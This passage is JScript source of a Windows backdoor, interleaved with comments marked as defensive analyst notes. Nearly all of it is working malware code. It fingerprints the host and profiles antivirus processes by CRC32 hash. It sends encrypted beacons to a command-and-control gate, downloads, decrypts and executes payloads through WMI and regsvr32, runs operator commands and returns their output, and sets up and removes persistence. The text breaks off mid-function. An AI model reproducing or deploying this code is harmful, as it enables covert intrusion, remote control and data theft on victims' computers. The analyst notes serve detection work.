var v12 = "l";
var v13 = "m";
var v14 = "n";
var v15 = "o";
var v16 = "p";
var v17 = "q";
var v18 = "r";
var v19 = "s";
var v20 = "t";
var v21 = "u";
var v22 = "v";
var v23 = "w";
var v24 = "x";
var v25 = "y";
var v26 = "z";
var v27 = "1";
var v28 = "2";
var v29 = "3";
var v30 = "4";
var v31 = "5";
var ret7;
try {
var loc = obj("WbemScripting.SWbemLocator");
var svc = loc.ConnectServer(".", "root\\cimv2");
var coll = svc.ExecQuery("SELECT * FROM Win32_Process");
var items = new Enumerator(coll);
while (items.atEnd() === false) {
itemNow = items.item();
if (itemNow) {
ExeNow = itemNow.Name;
tList.push(ExeNow);
}
items.moveNext();
}
ExeNow = "";
wInternal = 1;
} catch (ave1) {
// WMI unavailable: write the process list to a temp file via the obfuscated command
rFile = xTmp + tempNow();
var r1 = rStr(rInt(4, 8));
ret7 = wmi_command('cmd /v /c set "' + r1 + '=s" && ta!' + r1 + '!kli!' + r1 + '!t /NH /FO C!' + r1 + '!V > "' + rFile + '"', 1);
if (ret7 == false) {
dFile(rFile);
return "0";
}
wInternal = 0;
}
if (wInternal == 0) {
// read the temp file back, delete it, and split it into lines
try {
if (fexist(rFile) === true) {
fso = obj("Scripting.FileSystemObject");
file4 = fso.OpenTextFile(rFile, 1, 0);
if (file4.AtEndOfStream === false) {
vStr = file4.ReadAll();
}
file4.Close();
dFile(rFile);
} else {
return "0";
}
} catch (eav1) {
return "0";
}
try {
if (vStr) {
tList = vStr.split(/\r?\n/);
} else {
return "0";
}
} catch (eav3) {
return "0";
}
}
try {
if (tList.length <= 5) {
return "0";
}
crc32_init();
i = 0;
do {
if (wInternal == 1) {
rExe = tList[i];
} else {
// CSV line: the image name is the first double-quoted field
ExeNow = tList[i];
tL2 = ExeNow.split('"');
rExe = tL2[1];
}
if ((rExe) && (rExe.length >= 4)) {
cNow = b_crc32(rExe.toLowerCase());
// skip list: hashes that are never recorded (which names they stand for is not shown)
if (cNow && cNow !== 3377271179 && cNow !== 3106260013 && cNow !== 902868994 && cNow !== 74504709 && cNow !== 3187896405 && cNow !== 1036299297 && cNow !== 2619149582 && cNow !== 3034799888 && cNow !== 3286091477 && cNow !== 1025985939 && cNow !== 437725275 && cNow !== 3520973717 && cNow !== 81053313 && cNow !== 3027707000 && cNow !== 1251423904 && cNow !== 3867582538 && cNow !== 961692650 && cNow !== 1073290778 && cNow !== 3024872867 && cNow !== 1105170146 && cNow !== 333580186 && cNow !== 2027685132 && cNow !== 4097471352) {
pList.push(cNow);
}
}
rExe = "";
i += 1;
} while (i < tList.length);
tList = [];
tL2 = [];
} catch (eav3) {
return "0";
}
if (pList.length >= 5) {
cNow = 0;
x = 0;
do {
pNow = pList[x];
// each case appends its code once; rAV.indexOf guards against duplicates
switch (pNow) {
case 4167611121:
if (rAV.indexOf(v1) === -1) {
rAV += v1 + ",";
}
break;
case 877060326:
if (rAV.indexOf(v1) === -1) {
rAV += v1 + ",";
}
break;
case 305523985:
if (rAV.indexOf(v2) === -1) {
rAV += v2 + ",";
}
break;
case 800732934:
if (rAV.indexOf(v2) === -1) {
rAV += v2 + ",";
}
break;
case 1964687411:
if (rAV.indexOf(v2) === -1) {
rAV += v2 + ",";
}
break;
case 2528998123:
if (rAV.indexOf(v2) === -1) {
rAV += v2 + ",";
}
break;
case 536747592:
if (rAV.indexOf(v4) === -1) {
rAV += v4 + ",";
}
break;
case 184741780:
if (rAV.indexOf(v4) === -1) {
rAV += v4 + ",";
}
break;
case 242152363:
if (rAV.indexOf(v5) === -1) {
rAV += v5 + ",";
}
break;
case 3038770874:
if (rAV.indexOf(v6) === -1) {
rAV += v6 + ",";
}
break;
case 1863628361:
if (rAV.indexOf(v6) === -1) {
rAV += v6 + ",";
}
break;
case 1779566114:
if (rAV.indexOf(v6) === -1) {
rAV += v6 + ",";
}
break;
case 19515369:
if (rAV.indexOf(v7) === -1) {
rAV += v7 + ",";
}
break;
case 2229870333:
if (rAV.indexOf(v7) === -1) {
rAV += v7 + ",";
}
break;
case 4056687588:
if (rAV.indexOf(v7) === -1) {
rAV += v7 + ",";
}
break;
case 1081013580:
if (rAV.indexOf(v7) === -1) {
rAV += v7 + ",";
}
break;
case 238643926:
if (rAV.indexOf(v8) === -1) {
rAV += v8 + ",";
}
break;
case 3103805340:
if (rAV.indexOf(v8) === -1) {
rAV += v8 + ",";
}
break;
case 3898904431:
if (rAV.indexOf(v9) === -1) {
rAV += v9 + ",";
}
break;
case 2447720335:
if (rAV.indexOf(v9) === -1) {
rAV += v9 + ",";
}
break;
case 1474450799:
if (rAV.indexOf(v9) === -1) {
rAV += v9 + ",";
}
break;
case 1087054291:
if (rAV.indexOf(v10) === -1) {
rAV += v10 + ",";
}
break;
case 3237881663:
if (rAV.indexOf(v11) === -1) {
rAV += v11 + ",";
}
break;
case 2928704260:
if (rAV.indexOf(v12) === -1) {
rAV += v12 + ",";
}
break;
case 3457522114:
if (rAV.indexOf(v13) === -1) {
rAV += v13 + ",";
}
break;
case 1864254150:
if (rAV.indexOf(v13) === -1) {
rAV += v13 + ",";
}
break;
case 2866464079:
if (rAV.indexOf(v13) === -1) {
rAV += v13 + ",";
}
break;
case 3233790880:
if (rAV.indexOf(v14) === -1) {
rAV += v14 + ",";
}
break;
case 3314468719:
if (rAV.indexOf(v15) === -1) {
rAV += v15 + ",";
}
break;
case 2432672291:
if (rAV.indexOf(v16) === -1) {
rAV += v16 + ",";
}
break;
case 332293705:
if (rAV.indexOf(v17) === -1) {
rAV += v17 + ",";
}
break;
case 3917603449:
if (rAV.indexOf(v17) === -1) {
rAV += v17 + ",";
}
break;
case 3707949399:
if (rAV.indexOf(v17) === -1) {
rAV += v17 + ",";
}
break;
case 61053860:
if (rAV.indexOf(v17) === -1) {
rAV += v17 + ",";
}
break;
case 1570161171:
if (rAV.indexOf(v18) === -1) {
rAV += v18 + ",";
}
break;
case 1146093233:
if (rAV.indexOf(v19) === -1) {
rAV += v19 + ",";
}
break;
case 3758109384:
if (rAV.indexOf(v20) === -1) {
rAV += v20 + ",";
}
break;
case 3601606648:
if (rAV.indexOf(v21) === -1) {
rAV += v21 + ",";
}
break;
case 2544592543:
if (rAV.indexOf(v22) === -1) {
rAV += v22 + ",";
}
break;
case 2514406649:
if (rAV.indexOf(v23) === -1) {
rAV += v23 + ",";
}
break;
case 807313958:
if (rAV.indexOf(v24) === -1) {
rAV += v24 + ",";
}
break;
case 2213386403:
if (rAV.indexOf(v25) === -1) {
rAV += v25 + ",";
}
break;
case 2880445231:
if (rAV.indexOf(v26) === -1) {
rAV += v26 + ",";
}
break;
case 2394653102:
if (rAV.indexOf(v27) === -1) {
rAV += v27 + ",";
}
break;
case 1164644511:
if (rAV.indexOf(v3) === -1) {
rAV += v3 + ",";
}
break;
case 1683252343:
if (rAV.indexOf(v28) === -1) {
rAV += v28 + ",";
}
break;
case 1460978182:
if (rAV.indexOf(v29) === -1) {
rAV += v29 + ",";
}
break;
case 3576979024:
if (rAV.indexOf(v30) === -1) {
rAV += v30 + ",";
}
break;
case 3540381638:
if (rAV.indexOf(v31) === -1) {
rAV += v31 + ",";
}
break;
case 4028018370:
if (rAV.indexOf(v31) === -1) {
rAV += v31 + ",";
}
break;
}
x += 1;
} while (x < pList.length);
if (rAV.length >= 1) {
// drop the trailing comma
if (rAV.substring(rAV.length - 1) === ",") {
rAV = rAV.substring(0, rAV.length - 1);
}
} else {
rAV = "0";
}
} else {
rAV = "0";
}
pList = [];
if (rAV) {
return rAV;
} else {
return "0";
}
}
// Hex-encodes the string form of str, one character code at a time, and returns
// the concatenation. Returns "0" for falsy input.
// The codes are not zero-padded (toString(16)), so a code below 0x10 yields a
// single digit and the output cannot always be decoded unambiguously.
// On error it returns the plain string form of the input instead.
function ascii_to_hex(str) {
var arr1 = [];
var hex1;
var str1;
if (!str) {
return "0";
}
try {
str1 = str.toString();
var n = 0;
var count1 = str1.length;
do {
hex1 = Number(str1.charCodeAt(n)).toString(16);
arr1.push(hex1);
n = n + 1;
} while (n < count1);
return arr1.join('');
} catch (e93) {
try {
str1 = str.toString();
} catch (e93) {
str1 = str;
}
if (str1) {
return str1;
} else {
return str;
}
}
}
// Host identifier: takes the creation date of C:\Windows\notepad.exe (falling
// back to C:\Windows\winhlp32.exe), and returns the hex encoding of that date's
// string form via ascii_to_hex(). Returns "0" when neither file can be read.
// bot_header() sends this value as the first field of the beacon.
function os_hwid_install_date() {
var objFSO1;
var objFile;
var dt1;
try {
objFSO1 = obj("Scripting.FileSystemObject");
objFile = objFSO1.GetFile("C:\\Windows\\notepad.exe");
dt1 = new Date(objFile.DateCreated);
} catch (e96) {
try {
objFSO1 = obj("Scripting.FileSystemObject");
objFile = objFSO1.GetFile("C:\\Windows\\winhlp32.exe");
dt1 = new Date(objFile.DateCreated);
} catch (e94) {
return "0";
}
}
if (!dt1) {
return "0";
}
return ascii_to_hex(dt1);
}
// OS version probe without spawning a process: copies C:\Windows\notepad.exe
// (fallback: winhlp32.exe) to a temp file, reads its file version, deletes the
// copy, and looks for a known "major.minor." prefix in the version string.
// Returns the matched prefix ("5.1.", "6.0.", "6.1.", "6.2.", "6.3.", "10.0.",
// "5.2.") or "0". Side effect: the text after the prefix is stored in the
// global Build.
// Analyst note: a copy of notepad.exe appearing briefly as <number>.txt under the
// xTmp prefix is the file-system trace of this check.
function os_version_no_cmd() {
var objFSO;
var verzz;
var Vers1 = "5.1.";
var Vers2 = "5.2.";
var Vers3 = "6.0.";
var Vers4 = "6.1.";
var Vers5 = "6.2.";
var Vers6 = "6.3.";
var Vers7 = "10.0.";
var xNow = "";
var vSplit = [];
var Temp1;
var savTo = "";
try {
objFSO = obj("Scripting.FileSystemObject");
savTo = xTmp + tempNow();
objFSO.CopyFile("C:\\Windows\\notepad.exe", savTo);
verzz = objFSO.GetFileVersion(savTo);
dFile(savTo);
savTo = "";
} catch (e99) {
try {
objFSO = obj("Scripting.FileSystemObject");
savTo = xTmp + tempNow();
objFSO.CopyFile("C:\\Windows\\winhlp32.exe", savTo);
verzz = objFSO.GetFileVersion(savTo);
dFile(savTo);
savTo = "";
} catch (e98) {
return "0";
}
}
if (!verzz) {
return "0";
}
try {
// first match wins; "5.2." is tested last
if (verzz.indexOf(Vers1) !== -1) {
xNow = Vers1;
}
if (!xNow) {
if (verzz.indexOf(Vers3) !== -1) {
xNow = Vers3;
}
}
if (!xNow) {
if (verzz.indexOf(Vers4) !== -1) {
xNow = Vers4;
}
}
if (!xNow) {
if (verzz.indexOf(Vers5) !== -1) {
xNow = Vers5;
}
}
if (!xNow) {
if (verzz.indexOf(Vers6) !== -1) {
xNow = Vers6;
}
}
if (!xNow) {
if (verzz.indexOf(Vers7) !== -1) {
xNow = Vers7;
}
}
if (!xNow) {
if (verzz.indexOf(Vers2) !== -1) {
xNow = Vers2;
}
}
Vers1 = "";
Vers2 = "";
Vers3 = "";
Vers4 = "";
Vers5 = "";
Vers6 = "";
Vers7 = "";
if (xNow) {
// everything after the prefix becomes the build string
vSplit = verzz.split(xNow);
if (vSplit[1]) {
Temp1 = vSplit[1];
if (Temp1) {
Build = Temp1;
} else {
Build = "0";
}
}
return xNow;
} else {
return "0";
}
} catch (e99) {
return "0";
}
}
// Collects local IP addresses and returns them as a de-duplicated,
// comma-separated string ("0.0.0.0" excluded), or "0" when none are found.
// Collection paths:
//   1. WMI: first IPAddress entry of every IP-enabled
//      Win32_NetworkAdapterConfiguration instance.
//   2. On failure, a cmd.exe line that uses delayed expansion of a randomly named
//      variable set to "I" to assemble an ipconfig | findstr /R /C:"IPv4 Address"
//      pipeline, redirected to a temp file that is read and deleted.
// The fallback depends on the English "IPv4 Address" label and on ": " as the
// separator, so it yields nothing on systems where ipconfig output is localised.
function local_ip2() {
var vStr = "";
var fso;
var file2;
var xRet = "";
var xNow = "";
var vSplit = [];
var xSplit = [];
var i;
var rFile = "";
var xipnow = "";
var ipsList = [];
var itemNow2;
var ret5;
try {
var loc2 = obj("WbemScripting.SWbemLocator");
var svc2 = loc2.ConnectServer(".", "root\\cimv2");
var col2 = svc2.ExecQuery("SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True");
var items2 = new Enumerator(col2);
while (items2.atEnd() === false) {
itemNow2 = items2.item();
if (itemNow2) {
xipnow = itemNow2.IPAddress(0);
if (xipnow) {
ipsList.push(xipnow);
}
}
items2.moveNext();
}
} catch (eip1) {
try {
rFile = xTmp + tempNow();
var r1 = rStr(rInt(4, 8));
ret5 = wmi_command('cmd /v /c set "' + r1 + '=I" && !' + r1 + '!pconf!' + r1 + '!g | f!' + r1 + '!ndstr /R /C:"!' + r1 + '!Pv4 Address" > "' + rFile + '"', 1);
r1 = "";
if (ret5 == false) {
dFile(rFile);
return "0";
}
if (fexist(rFile) === true) {
fso = obj("Scripting.FileSystemObject");
file2 = fso.OpenTextFile(rFile, 1, 0);
if (file2.AtEndOfStream === false) {
vStr = file2.ReadAll();
}
file2.Close();
dFile(rFile);
} else {
return "0";
}
if (vStr) {
vSplit = vStr.split(/\r?\n/);
} else {
return "0";
}
// always true for an array; the else branch below is unreachable
if (vSplit.length >= 0) {
i = 0;
do {
xNow = vSplit[i];
if (xNow) {
// keep the text after ": " on lines that contain exactly one separator
xSplit = xNow.split(": ");
if (xSplit.length === 2) {
xipnow = xSplit[1];
if (xipnow) {
ipsList.push(xipnow);
}
}
}
i += 1;
} while (i < vSplit.length);
vSplit = [];
xSplit = [];
} else {
return "0";
}
} catch (e891) {
return "0";
}
}
xipnow = "";
i = 0;
try {
if (ipsList.length <= 0) {
return "0";
}
do {
xipnow = ipsList[i];
// substring test, so an address contained in an earlier one is also dropped
if (xipnow && xRet.indexOf(xipnow) === -1 && xipnow !== "0.0.0.0") {
xRet = xRet + xipnow + ",";
}
i += 1;
} while (i < ipsList.length);
xRet = xRet.substring(0, xRet.length - 1);
if (xRet) {
return xRet;
} else {
return "0";
}
} catch (eip2) {
return "0";
}
}
// Reads the ProductType registry value and returns "1" when it is "WinNT"
// and "3" for any other value of three or more characters.
// Returns "1" as well when the value is shorter or the read fails.
function os_product_no_wmi() {
var key1 = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType";
var reg1;
var rdata1 = "";
try {
reg1 = obj("WScript.Shell");
rdata1 = reg1.RegRead(key1);
if (rdata1.length >= 3) {
if (rdata1 == "WinNT") {
return "1";
} else {
return "3";
}
} else {
return "1";
}
} catch (eos5) {
return "1";
}
}
// Builds the host-profile string sent to the C2. Every field falls back to "0".
// Layout (pipe-delimited, leading "|"):
//   |host id|process codes|UNM|PCN|OS version prefix|product type|build|64-bit flag|IPs|BV
// where host id = os_hwid_install_date(), process codes = cAV(), UNM/PCN are
// filtered to printable ASCII, the 64-bit flag is "1" or "0", and BV is the
// version string. Side effects: clears the CRC table and blanks BV afterwards.
// Analyst note: this layout is what a decrypted first beacon should look like when
// traffic is decoded with the scheme in hit_Gate().
function bot_header() {
var vParti = "";
var osf = "";
var vNTvers = "";
var vlIP = "";
var b2 = "";
var av11 = "";
var sRet = "";
var uUnicode = "";
var pUnicode = "";
osf = os_version_no_cmd(); // also sets the global Build
if (!osf) {
osf = "0";
}
if (!Build) {
Build = "0";
}
vlIP = local_ip2();
if (!vlIP) {
vlIP = "0";
}
if (myBits() === "64") {
b2 = "1";
} else {
b2 = "0";
}
vNTvers = os_product_no_wmi();
if (!vNTvers) {
vNTvers = "0";
}
av11 = cAV();
table = []; // CRC table is only needed by cAV()
if (!av11) {
av11 = "0";
}
vParti = os_hwid_install_date();
if (!vParti) {
vParti = "0";
}
uUnicode = remove_non_ascii(UNM);
if (!uUnicode) {
uUnicode = "0";
}
pUnicode = remove_non_ascii(PCN);
if (!pUnicode) {
pUnicode = "0";
}
sRet = "|" + vParti + "|" + av11 + "|" + uUnicode + "|" + pUnicode + "|" + osf + "|" + vNTvers + "|" + Build + "|" + b2 + "|" + vlIP + "|" + BV;
BV = "";
return sRet;
}
// Main C2 exchange: POSTs POSTdata to URL and, when gResponse === 1, returns the
// decrypted reply.
// Request body:  base91( RC4-style(Rkey + nonce, POSTdata + "|" + random + "|") + nonce )
//                with a 2-character random nonce and 8..32 random padding characters.
// Response body: base91-decoded; the last 2 characters are the nonce and the rest
//                is decrypted with Rkey + nonce.
// Return values when gResponse === 1: the decrypted text, "OK" for an empty
// HTTP 200 body, "gErr" on any failure. With any other gResponse the function
// returns undefined unless a transport error produced "gErr".
// Transport selection and the method 0 -> 1 retry work as in check_Host().
// Analyst note: with Rkey from this sample, captured traffic can be decrypted
// offline; the key material is entirely static apart from the in-band nonce.
function hit_Gate(URL, POSTdata, gResponse, method) {
var Resp = "";
var Temp89 = "";
var con4;
var respzz;
if (SYSTEM === 1) {
con4 = xhr;
} else {
if (method === 1) {
con4 = xhr;
} else {
con4 = con;
}
}
try {
con4.open("POST", URL, false);
} catch (e10) {
if (SYSTEM === 0 && method === 0) {
return hit_Gate(URL, POSTdata, gResponse, 1);
} else {
return "gErr";
}
}
if (gResponse === 1) {
con4.onreadystatechange = function() {
if (con4.readyState === 4) {
if (con4.status === 200) {
respzz = con4.responseText;
if (respzz) {
Temp89 = base91_decode(respzz);
if (Temp89) {
// split ciphertext from the trailing 2-character nonce
var wo = Temp89.substr(0, Temp89.length - 2);
var KeyNow = Temp89.substr(Temp89.length - 2);
Resp = zzzz4(Rkey + KeyNow, wo);
if (Resp) {
respzz = "";
} else {
Resp = "gErr";
}
} else {
Resp = "gErr";
}
} else {
Resp = "OK";
}
} else {
Resp = "gErr";
}
}
};
}
var keynow = rStr(2);
var rNow = rInt(8, 32);
var not_unique = POSTdata + "|" + rStr(rNow) + "|";
var xCrypted = zzzz4(Rkey + keynow, not_unique) + keynow;
var encoded = base91_encode(xCrypted);
var g11 = 0;
if (SYSTEM === 1 || method === 1) {
try {
// ServerXMLHTTP option 2 with value 13056: ignore all server certificate errors
con4.setOption(2, 13056);
} catch (e411) {
g11 = 1; // set but never read in this function
}
}
try {
con4.send(encoded);
} catch (e11) {
if (SYSTEM === 0 && method === 0) {
return hit_Gate(URL, POSTdata, gResponse, 1);
} else {
return "gErr";
}
}
if (gResponse === 1) {
return Resp;
}
}
// Download-and-execute handler for the "d&exec" task.
// Steps: GET zURL with the XMLHTTP client; read the body through an ADODB.Stream
// as Charset 437 text; convert to bytes (tB); decrypt with myKey (zzz4Bytes);
// require an "MZ" header; write the result under the xApp prefix; launch it.
//   xPE === "exe": saved as <number>.txt (tempNow) and started directly.
//   xPE === "dll": saved as <number>.ocx and loaded with regsvr32.exe, using the
//                  SysWOW64 copy on 64-bit systems; xEntryP selects the switches
//                  ("1" or default: /s /i, "2": /s /n /i, "3": /s /u).
// Returns "OK" when the launch call succeeded, "E" on failure. The `return "E"`
// statements inside the readystatechange handler only leave the handler, so in
// those cases dExec itself returns the initial "" (callers test for "OK").
// Analyst notes: the payload is encrypted in transit and only exists in clear on
// disk; detection anchors are a PE file with a .txt extension being executed,
// regsvr32.exe /s loading an .ocx from a user-writable path, and both being
// spawned through WMI (see wmi_command).
function dExec(zURL, myKey, xPE, xEntryP) {
var ret2 = "";
var Final;
var con2 = con;
var binVariant;
var adb;
var ret6;
var cCommand;
var dq = '"';
try {
con2.open("GET", zURL, false);
} catch (e16) {
return "E";
}
con2.onreadystatechange = function() {
if (con2.readyState === 4) {
if (con2.status === 200) {
try {
// binary body -> text under code page 437, so each byte becomes one character
adb = obj("ADODB.Stream");
adb.open();
adb.type = 1;
adb.write(con2.responsebody);
adb.position = 0;
adb.Type = 2;
adb.Charset = 437;
binVariant = adb.ReadText();
} catch (ewtf) {
return "E";
}
if (binVariant) {
var ByteArray = tB(binVariant);
var xDecrypted = zzz4Bytes(ByteArray, myKey);
if (mZcheck(xDecrypted)) {
if (xPE === "exe") {
Final = xApp + "\\" + tempNow();
}
if (xPE === "dll") {
Final = xApp + "\\" + tempExtra() + ".ocx";
}
try {
// the same stream is reused to write the decrypted bytes to disk
adb.position = 0;
adb.type = 2;
adb.Charset = 437;
adb.WriteText(tS(xDecrypted));
adb.SaveToFile(Final);
adb.close();
} catch (ewtf1) {
return "E";
}
if (xPE === "exe") {
ret6 = wmi_command(dq + Final + dq, 0);
Final = "";
if (ret6 == true) {
ret2 = "OK";
} else {
ret2 = "E";
}
}
if (xPE === "dll") {
var Mitm_exe = "regsvr32.exe";
if (Final) {
var path1 = myEnv("SYSTEMROOT", 0);
if (myBits() === "64") {
path1 += "\\SysWOW64\\" + Mitm_exe;
} else {
path1 += "\\System32\\" + Mitm_exe;
}
switch (xEntryP) {
case "1":
cCommand = " /s /i ";
break;
case "2":
cCommand = " /s /n /i ";
break;
case "3":
cCommand = " /s /u ";
break;
default:
cCommand = " /s /i ";
}
path1 += cCommand + dq + Final + dq;
cCommand = "";
ret6 = wmi_command(path1, 0);
path1 = "";
if (ret6 == true) {
ret2 = "OK";
} else {
ret2 = "E";
}
} else {
ret2 = "E";
}
}
} else {
ret2 = "E";
}
} else {
ret2 = "E";
}
} else {
ret2 = "E";
}
}
};
try {
con2.send();
} catch (e5) {
return "E";
}
return ret2;
}
// Remote command handler: runs the operator-supplied string xCo as
// cmd /v /c <xCo> > "<temp file>" 2>&1, waits for it to finish, reads the file,
// deletes it, removes blank lines and returns the text.
// Returns "0" when xCo is empty, the launch fails, the file is missing or empty,
// or any step throws.
// Analyst note: xCo is concatenated into the command line unmodified, so the
// executed command is visible in process-creation logs; the redirect to a
// <number>.txt file under the xTmp prefix followed by "2>&1" is a constant suffix.
function rev_cmd(xCo) {
var fso3;
var rFile = "";
var file6;
var vStr;
var rt1;
try {
if (xCo) {
rFile = xTmp + tempNow();
rt1 = wmi_command("cmd /v /c " + xCo + ' > "' + rFile + '" 2>&1', 1);
if (rt1 == false) {
dFile(rFile);
return "0";
}
if (fexist(rFile) === true) {
fso3 = obj("Scripting.FileSystemObject");
file6 = fso3.OpenTextFile(rFile, 1, 0);
if (file6.AtEndOfStream === false) {
vStr = file6.ReadAll();
}
file6.Close();
dFile(rFile);
} else {
return "0";
}
} else {
return "0";
}
} catch (eg1) {
return "0";
}
try {
if (vStr) {
// drop lines that are empty or whitespace-only
vStr = vStr.replace(/^\s*$(?:\r\n?|\n)/gm, "");
return vStr;
} else {
return "0";
}
} catch (eg2) {
return "0";
}
}
// Shared state for the task loop:
//  - mainCommand: last relaunch command line built in eTask ("more_onion") and main().
//  - fCore / fStart: full paths of two ".txt" files under workingDir; check_inside() fills
//    them from the second and third fields of the registry value stored at xStore.
var mainCommand = "";
var fCore = "";
var fStart = "";
/**
 * Task dispatcher: parses one "|"-separated task string received from the gate and
 * executes it, then reports the outcome back with hit_Gate(Gate, …, 0, 0).
 *
 * Layout as read by this function: pieces[1] = task type, pieces[2] = task id,
 * pieces[3..] = task arguments. pieces[0] is not used here. Strings with fewer than five
 * fields, or with an unknown task type, are ignored.
 *
 * Task types handled:
 *  - "d&exec"     download and run a payload through dExec() (one retry).
 *  - "gtfo"       remove persistence entries and files, then flag the loop to stop and
 *                 self-delete.
 *  - "more_onion" relaunch fCore through main_mitm and stop this instance.
 *  - "via_c"      run a command line through cmd, result reported as "1" or "0" only.
 *  - "more_time"  run a command line and send its output back, base64-encoded.
 *
 * Replies have the form `<PreserveH>|<status or output>|<task id>` ("more_time" appends
 * the base64 of the command that was run).
 *
 * @param {string} fullTask Raw task string; falsy values are ignored.
 *
 * Analyst notes (defensive):
 *  - The registry paths, file names and command lines built below are the host artifacts
 *    to hunt for; the "gtfo" branch deletes most of them, so their absence on a host does
 *    not show that the host was never affected.
 *  - hit_Gate, wmi_command, wmi_waitfor2, rexist, fexist, dFile and base64_encode are
 *    defined outside this view.
 */
function eTask(fullTask) {
if (fullTask) {
var eState = "0";
var TaskReply;
var x1;
var Note;
var Sp;
var tURL;
var fPasw;
var flink;
var ret77;
var tPE;
var dq2 = "";
var UniqKey = "";
var reg1 = "";
var uName = "";
var r_sh = "";
var ret4;
var startPoint;
var pieces = fullTask.split("|");
var count1 = pieces.length;
if (count1 >= 5) {
var tType = pieces[1];
var tID = pieces[2];
switch (tType) {
// --- d&exec: pieces[3] = "<url>,<key>", pieces[4] = "exe" | "dll" (defaults to "exe"),
//     pieces[5] = regsvr32 mode, read only when there are exactly 8 fields.
case "d&exec":
if (count1 >= 7) {
flink = pieces[3];
tPE = pieces[4];
if (!tPE) {
tPE = "exe";
}
if (flink) {
if (flink.indexOf(",") !== -1) {
Sp = flink.split(",");
tURL = Sp[0];
fPasw = Sp[1];
if (count1 === 8) {
startPoint = pieces[5];
}
if (tURL && fPasw) {
if (dExec(tURL, fPasw, tPE, startPoint) === "OK") {
eState = "1";
} else {
// One retry after a short wait; a second failure leaves eState at "0".
wmi_waitfor2(1, 0);
if (dExec(tURL, fPasw, tPE, startPoint) === "OK") {
eState = "1";
}
}
}
}
}
}
// The result is reported even when the task was malformed (eState stays "0").
TaskReply = PreserveH + "|" + eState + "|" + tID;
hit_Gate(Gate, TaskReply, 0, 0);
break;
// --- gtfo: uninstall. Each step is wrapped separately so one failure does not stop
//     the remaining clean-up; ret77 becomes "1" as soon as any removal succeeds.
case "gtfo":
// Logon-script persistence value (UserInitMprLogonScript under <rootK>\Environment).
reg1 = rootK + "\\Environment\\UserInitMprLogonScript";
try {
x1 = obj("WScript.Shell");
} catch (er78) {
x1 = false;
}
if (x1) {
try {
// The first comma-separated field of the xStore value names the Run-key entry
// (and, when SYSTEM === 1, the scheduled task removed further down).
if (rexist(xStore) === true) {
Note = x1.RegRead(xStore);
if (Note && Note.indexOf(",") !== -1) {
Sp = Note.split(",");
uName = Sp[0];
UniqKey = rootK + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + uName;
}
}
} catch (e104) {
UniqKey = "";
}
try {
// Remove the Run-key entry (does not affect ret77).
if (UniqKey && rexist(UniqKey) === true) {
x1.RegDelete(UniqKey);
}
} catch (e80) {
UniqKey = "";
}
try {
// Remove the logon-script value.
if (reg1 && rexist(reg1) === true) {
x1.RegDelete(reg1);
ret77 = "1";
}
} catch (e81) {
ret77 = "0";
}
try {
// Remove the configuration value stored under Software\Microsoft\Notepad.
if (xStore && rexist(xStore) === true) {
x1.RegDelete(xStore);
ret77 = "1";
}
} catch (e84) {
if (ret77 !== "1") {
ret77 = "0";
}
}
try {
// Remove the two ".txt" files referenced by the configuration value.
if (fexist(fCore) === true) {
dFile(fCore);
ret77 = "1";
}
} catch (e82) {
if (ret77 !== "1") {
ret77 = "0";
}
}
try {
if (fexist(fStart) === true) {
dFile(fStart);
ret77 = "1";
}
} catch (e83) {
if (ret77 !== "1") {
ret77 = "0";
}
}
try {
// Only in the SYSTEM === 1 case: delete the scheduled task named after uName.
if (uName && SYSTEM === 1) {
ret4 = wmi_command("SCHTASKS.exe /Delete /TN " + uName + " /F", 1);
}
if (ret4 == true) {
ret77 = "1";
}
} catch (e84) {
if (ret77 !== "1") {
ret77 = "0";
}
}
} else {
ret77 = "0";
}
if (!ret77) {
ret77 = "0";
}
hit_Gate(Gate, PreserveH + "|" + ret77 + "|" + tID, 0, 0);
if (ret77 === "1") {
// Stop polling; main() then deletes main_mitm because selfdel is set.
gtfo = true;
selfdel = true;
}
break;
// --- more_onion: start `"<main_mitm>" "<fCore>" "<fCore>"` (main_mitm is the msxsl.exe
//     path set at the bottom of the file; the same file is passed as both arguments)
//     and stop this instance on success.
case "more_onion":
try {
if (fexist(fCore) === true) {
dq2 = '"';
mainCommand = dq2 + main_mitm + dq2 + " " + dq2 + fCore + dq2 + " " + dq2 + fCore + dq2;
ret4 = wmi_command(mainCommand, 0);
if (ret4 == true) {
ret77 = "1";
} else {
ret77 = "0";
}
} else {
ret77 = "0";
}
} catch (e1672) {
ret77 = "0";
}
hit_Gate(Gate, PreserveH + "|" + ret77 + "|" + tID, 0, 0);
if (ret77 === "1") {
gtfo = true;
}
break;
// --- via_c: exactly 6 fields; pieces[3] is run as `cmd /v /c <pieces[3]> & exit`.
//     No output is collected, only success or failure of the launch.
case "via_c":
if (count1 === 6) {
flink = pieces[3];
if (flink) {
ret4 = wmi_command("cmd /v /c " + flink + " & exit", 0);
if (ret4 == true) {
eState = "1";
} else {
eState = "0";
}
if (!eState) {
eState = "0";
}
TaskReply = PreserveH + "|" + eState + "|" + tID;
hit_Gate(Gate, TaskReply, 0, 0);
}
}
break;
// --- more_time: exactly 6 fields; pieces[3] is run through rev_cmd() and its output is
//     returned base64-encoded ("0" is sent unencoded when there was no output).
case "more_time":
if (count1 === 6) {
flink = pieces[3];
if (flink) {
r_sh = rev_cmd(flink);
if (r_sh) {
if (r_sh !== "0") {
r_sh = base64_encode(r_sh);
}
} else {
r_sh = "0";
}
TaskReply = PreserveH + "|" + r_sh + "|" + tID + "|" + base64_encode(flink);
r_sh = "";
hit_Gate(Gate, TaskReply, 0, 0);
}
}
break;
}
}
}
}
/**
 * One iteration of the polling loop: either relaunches the stored script once the
 * iteration budget is used up, or polls the gate and dispatches whatever comes back.
 *
 * Reads and updates the shared state PreserveH, xStore, rcon_now, gtfo and mainCommand.
 *
 * Analyst notes (defensive):
 *  - rcon_max is computed at the top of the file from hit_each and restart_h (24 with the
 *    values declared there). Presumably hit_each is in minutes, which would make the
 *    relaunch happen about every restart_h hours - wmi_waitfor is outside this view, so
 *    confirm the unit there.
 *  - Relaunch and self-delete both go through wmi_command(); the command lines are
 *    `"<main_mitm>" "<fCore>" "<fCore>"` and `cmd.exe /c del "<main_mitm>"`.
 *  - bot_header, hit_Gate, wmi_waitfor, wmi_command and fexist are defined outside this
 *    view; how the next iteration is scheduled is not visible here.
 */
function main() {
var dq2 = '"';
var HitNow = "";
var ret8;
// Build the beacon header once and reuse it for every request and reply.
